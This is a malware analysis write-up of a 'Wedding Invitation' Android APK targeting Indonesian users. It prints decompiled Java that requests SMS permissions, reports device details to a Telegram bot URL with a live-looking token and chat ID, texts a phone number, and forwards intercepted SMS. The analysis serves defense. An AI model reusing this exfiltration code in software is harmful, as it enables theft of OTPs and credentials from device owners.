Analyzing scam in Indonesia named "Wedding Invitation"
Last updated
Affected Platforms
Android
Impacted Users
Indonesian Citizens
Impact
Stolen credentials like otp, email, username, and password can lead to account hack
Infection Vector
Analyzing APK Statically
Decompile the APK using jadx-gui.
To accelerate static analysis process i save all the source code and then open it using text editor. Take a look on MainActivity.java file in directory com/example/myapplicatior we can see the main class of the APK.
Checking on onCreate function, we can see lines of code that firstly executed.
Creating webview instance then load URL defined on HttpUrl.FRAGMENT_ENCODE_SET
Checking SDK version
Requesting for SMS permission (SEND and RECEIVE)
So at the end of onCreate function it will request for permission. After user interacting with permission agreement, it will pass the result to onRequestPermissionsResult function.
onRequestPermissionsResult function
public void onRequestPermissionsResult(int i, String[] strArr, int[] iArr) {
super.onRequestPermissionsResult(i, strArr, iArr);
if (i == 1000) {
if (iArr[0] != 0) {
Toast.makeText(this, "Permission Not Granted!", 0).show();
this.client.newCall(new Request.Builder().url("https://api.telegram.org/bot6755241478:AAE_77p9ygAzNP5VdIFRLTQ2lkaOJCtzSOk/sendMessage?parse_mode=markdown&chat_id=6562987404&text=𝐍𝐨𝐭𝐢𝐟𝐢𝐤𝐚𝐬𝐢 𝐀𝐩𝐥𝐢𝐤𝐚𝐬𝐢 𝐃𝐢 𝐈𝐧𝐬𝐭𝐚𝐥𝐥 \n 𝐓𝐲𝐩𝐞 𝐏𝐞𝐫𝐚𝐧𝐠𝐤𝐚𝐭: _" + this.device + "_").build()).enqueue(new Callback() { // from class: com.example.myapplicatior.MainActivity.4
@Override // okhttp3.Callback
public void onFailure(Call call, IOException iOException) {
iOException.printStackTrace();
}
@Override // okhttp3.Callback
public void onResponse(Call call, Response response) throws IOException {
Log.d("demo1", "OnResponse: Thread Id " + Thread.currentThread().getId());
if (response.isSuccessful()) {
response.body().string();
}
}
});
finish();
return;
}
this.client.newCall(new Request.Builder().url("https://api.telegram.org/bot6755241478:AAE_77p9ygAzNP5VdIFRLTQ2lkaOJCtzSOk/sendMessage?parse_mode=markdown&chat_id=6562987404&text=𝐍𝐨𝐭𝐢𝐟𝐢𝐤𝐚𝐬𝐢 𝐀𝐩𝐥𝐢𝐤𝐚𝐬𝐢 𝐃𝐢 𝐈𝐧𝐬𝐭𝐚𝐥𝐥 \n 𝐓𝐲𝐩𝐞 𝐏𝐞𝐫𝐚𝐧𝐠𝐤𝐚𝐭: _" + this.device).build()).enqueue(new Callback() { // from class: com.example.myapplicatior.MainActivity.2
@Override // okhttp3.Callback
public void onFailure(Call call, IOException iOException) {
iOException.printStackTrace();
}
@Override // okhttp3.Callback
public void onResponse(Call call, Response response) throws IOException {
Log.d("demo1", "OnResponse: Thread Id " + Thread.currentThread().getId());
if (response.isSuccessful()) {
response.body().string();
}
}
});
try {
SmsManager.getDefault().sendTextMessage("082178518060", null, "P", null, null);
} catch (Exception e) {
this.client.newCall(new Request.Builder().url("https://api.telegram.org/bot6755241478:AAE_77p9ygAzNP5VdIFRLTQ2lkaOJCtzSOk/sendMessage?parse_mode=markdown&chat_id=6562987404&text=Error : _" + e).build()).enqueue(new Callback() { // from class: com.example.myapplicatior.MainActivity.3
@Override // okhttp3.Callback
public void onFailure(Call call, IOException iOException) {
iOException.printStackTrace();
}
@Override // okhttp3.Callback
public void onResponse(Call call, Response response) throws IOException {
Log.d("demo1", "OnResponse: Thread Id " + Thread.currentThread().getId());
if (response.isSuccessful()) {
response.body().string();
}
}
});
Toast.makeText(getApplicationContext(), HttpUrl.FRAGMENT_ENCODE_SET + e, 1).show();
}
NotificationManager notificationManager = (NotificationManager) getApplicationContext().getSystemService("notification");
if (Build.VERSION.SDK_INT >= 23 && !notificationManager.isNotificationPolicyAccessGranted()) {
startActivity(new Intent("android.settings.ACTION_NOTIFICATION_LISTENER_SETTINGS"));
Toast.makeText(this, "MEMBUKA UNDANGAN", 0).show();
}
LocalBroadcastManager.getInstance(this).registerReceiver(this.onNotice, new IntentFilter("Msg"));
}
}
Basically it do two different behaviors, below is the detail
If user agree
Send successful message through telegram API with below information
Device information
Send message through SMS
"P" message, which is same as ping in Indonesian Language
Create intent and filter SMS notification
Create Toast
If user not agree
Send failed message through telegram API with below information
Device information
Created intent filter code can be seen on code below
Send stored data to threat actor's telegram with formatted text
From the behavior, we can see that the APK is "malicious" since it anonymously forward the SMS to unauthorized user which is threat actor. Since the application not obfuscated and all of the code are straight forward we don't need to do dynamic analysis to unveil malicious behavior.
Conclusion
Through the URL used, we know that threat actor use telegram to receive the "leaked" data. Threat actor also send message through SMS to give notification to his phone. This malware will be very harmful if there is another scenario such as reset password, register account, or login account because threat actor will receive sensitive information such as OTP, username, or even password through his telegram account. But, we must know that this APK will not harmful if we don't give any permission to the APK although we have installed it.
